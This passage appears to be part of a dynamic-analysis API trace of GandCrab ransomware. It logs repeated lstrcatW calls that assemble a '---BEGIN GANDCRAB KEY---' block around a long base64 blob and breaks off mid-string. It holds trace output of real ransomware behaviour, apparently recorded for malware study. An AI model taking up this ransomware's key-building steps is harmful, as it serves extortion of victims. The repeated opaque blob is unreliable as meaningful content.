KEY---\r\n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\r\n") returned="---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n" [0040.774] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n", lpString2="---END GANDCRAB KEY---" | out: lpString1="---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---" [0040.774] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0V